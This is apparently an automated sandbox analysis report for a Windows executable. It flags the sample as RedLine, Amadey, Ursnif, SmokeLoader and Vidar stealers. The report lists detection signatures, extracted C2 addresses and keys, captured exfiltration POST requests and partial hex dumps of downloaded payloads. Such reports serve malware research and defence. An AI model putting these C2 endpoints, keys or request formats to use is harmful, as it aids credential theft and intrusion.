Windows Analysis Report
S2XJ2wbz7u.exe

Overview

General Information

Sample Name: S2XJ2wbz7u.exe
Analysis ID: 749806
MD5: ffb4cf34b38f126c917e1c1e1d26df73
SHA1: 36e558fdb10418aa971aea3f02d6ba1f4d566ed2
SHA256: 4a47fdbb09dd09ea813c0475d32f693cbbded09b3753def43179f91e1a8f8a55
Tags: exe, RedLineStealer

Detection

Ursnif, Amadey, RedLine, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Opens the same file many times (likely Sandbox evasion)
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: http://91.213.50.70/Wavafursq.jpeg Avira URL Cloud: Label: malware
Source: http://116.202.5.101:80 Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1 Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming Avira URL Cloud: Label: malware
Source: http://193.56.146.168/mia/solt.exe Avira URL Cloud: Label: malware
Source: http://91.213.50.70/Wavafursq.jpeg&BKl: Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: o36fafs3sn6xou.com Virustotal: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Metadefender: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\453D.exe ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Metadefender: Detection: 71%
Source: S2XJ2wbz7u.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3790.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tiddsjj Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\453D.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\816F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\59FE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6644.exe Joe Sandbox ML: detected
Source: 21.3.6CEC.exe.6c0000.0.unpack Avira: Label: TR/Downloader.Gen2
Source: 19.3.6644.exe.940000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.6644.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 19.2.6644.exe.930e67.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
Source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Compliance

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3790.exe Unpacked PE file: 13.2.3790.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6644.exe Unpacked PE file: 19.2.6644.exe.400000.0.unpack
Source: S2XJ2wbz7u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.206.73:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.53:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.216.243.155:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49806 version: TLS 1.2
Source: Binary string: C:\lulubob99\yu.pdb source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 3790.exe, 0000000D.00000002.412472703.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, 3790.exe, 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, 3790.exe, 0000000D.00000003.404528480.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.520940016.0000000000400000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
Source: Binary string: /.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?C:\lulubob99\yu.pdbQ source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: _.pdb source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\android.annotation.TestApi.module1 - Copy.pdb source: 816F.exe, 0000001A.00000000.437232628.0000000000192000.00000002.00000001.01000000.00000011.sdmp, 816F.exe.1.dr
Source: Binary string: (P&gHC:\Windows\System.ServiceModel.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\tahaf\to.pdbQ source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: C:\tahaf\to.pdb source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: SC:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: C:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: @C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: C:\Windows\explorer.exe Domain query: cdn-102.anonfiles.com
Source: C:\Windows\explorer.exe Domain query: bitbucket.org
Source: C:\Windows\explorer.exe Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe Domain query: u.to
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: raw.githubusercontent.com
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: anonfiles.com
Source: C:\Windows\explorer.exe Domain query: hoteldostyk.com
Source: C:\Windows\explorer.exe Domain query: iplogger.com
Source: C:\Windows\explorer.exe Network Connect: 89.208.107.216 80
Source: C:\Windows\explorer.exe Domain query: srshf.com
Source: C:\Windows\explorer.exe Domain query: transfer.sh
Source: C:\Windows\explorer.exe Domain query: 1ecosolution.it
Source: C:\Windows\explorer.exe Network Connect: 193.56.146.168 80
Source: C:\Windows\explorer.exe Domain query: cdn-104.anonfiles.com
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49725 -> 77.232.37.228:80
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49729 -> 77.232.37.228:80
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49733 -> 77.232.37.228:80
Source: Traffic Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49738 -> 89.208.107.216:80
Source: C:\Windows\explorer.exe DNS query: name: iplogger.com
Source: Malware configuration extractor URLs: 185.106.92.111:2510
Source: Malware configuration extractor URLs: http://o3l3roozuidudu.com/
Source: Malware configuration extractor URLs: http://o3npxslymcyfi2.com/
Source: Malware configuration extractor URLs: http://o3b1wk8sfk74tf.com/
Source: Malware configuration extractor URLs: https://t.me/deadftx
Source: Malware configuration extractor URLs: https://www.tiktok.com/@user6068972597711
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODI4MjM=Host: 193.56.146.174Content-Length: 82975Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Host: 193.56.146.174Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4877482924580855Host: 116.202.5.101Content-Length: 112010Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /785079514411.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0787962131917872Host: 116.202.5.101Content-Length: 118534Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:09 GMTContent-Type: application/octet-streamContent-Length: 382464Last-Modified: Sat, 19 Nov 2022 09:35:01 GMTConnection: keep-aliveETag: "6378a345-5d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 50 16 95 a1 31 78 c6 a1 31 78 c6 a1 31 78 c6 bf 63 ed c6 b5 31 78 c6 bf 63 fb c6 21 31 78 c6 bf 63 fc c6 8f 31 78 c6 86 f7 03 c6 a2 31 78 c6 a1 31 79 c6 db 31 78 c6 bf 63 f2 c6 a0 31 78 c6 bf 63 ec c6 a0 31 78 c6 bf 63 e9 c6 a0 31 78 c6 52 69 63 68 a1 31 78 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d3 af ec 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 22 01 00 00 b2 44 00 00 00 00 00 a5 48 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 46 00 00 04 00 00 b4 18 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 27 01 00 28 00 00 00 00 70 43 00 78 43 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 45 00 a0 0b 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 20 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 08 29 42 00 00 40 01 00 00 28 02 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 
00 00 00 78 43 02 00 00 70 43 00 00 44 02 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 8e 42 00 00 00 c0 45 00 00 44 00 00 00 92 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 19 Nov 2022 08:37:50 GMTETag: "58000-5edcebcd5f2db"Accept-Ranges: bytesContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 f4 f8 7d 92 95 96 2e 92 95 96 2e 92 95 96 2e 8c c7 03 2e 86 95 96 2e 8c c7 15 2e cb 95 96 2e 8c c7 12 2e b5 95 96 2e 51 9a cb 2e 91 95 96 2e 92 95 97 2e cc 95 96 2e 9b ed 12 2e 93 95 96 2e 8c c7 02 2e 93 95 96 2e 9b ed 07 2e 93 95 96 2e 52 69 63 68 92 95 96 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e1 92 78 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 42 01 00 00 48 04 00 00 00 00 00 50 af 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 28 da 05 00 03 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 a0 01 00 28 00 00 00 00 b0 05 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 41 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2e 48 00 00 00 60 01 00 00 4a 00 00 00 46 01 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f4 03 00 00 b0 01 00 00 e8 03 00 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 06 00 00 00 b0 05 00 00 08 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:49 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Wed, 09 Nov 2022 16:43:53 GMTConnection: keep-aliveETag: "636bd8c9-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 